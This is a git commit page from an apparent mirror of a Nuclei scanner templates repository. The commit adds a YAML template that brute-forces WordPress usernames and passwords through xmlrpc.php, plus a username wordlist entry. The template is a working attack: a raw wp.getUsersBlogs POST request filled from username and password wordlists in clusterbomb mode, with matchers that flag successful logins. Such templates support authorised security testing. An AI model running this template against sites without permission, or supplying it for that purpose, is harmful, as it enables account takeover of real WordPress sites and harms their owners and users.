daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added wordpress-xmlrpc-brute-force.yaml (#3445) 

* wp-xmlrpc-brute-force.yaml file was added

A Nuclei template for bruteforcing username and password through XMLRPC.

* wp-xmlrpc-brute-force.yaml file added

A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php

* wp-xmlrpc-brute-force.yaml file added

A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php

* Revert "wp-xmlrpc-brute-force.yaml file was added"

This reverts commit c0e4ca75a6ddbcf65e9443849a05c7b8f2625af9.

* few fixes

* Added wordpress user and pass list

* improved matcher

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
Exid 2021-12-29 20:04:23 +03:30 committed by GitHub
parent ce97393f95
commit 80489bce76
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
helpers/wordlists/wp-users.txt
View File

@ -9,3 +9,4 @@ root
support support
sysadmin sysadmin
test test
wordpress

50
vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml Normal file
View File

@ -0,0 +1,50 @@
id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: Ths template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
tags: wordpress,php,xmlrpc,fuzz
requests:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and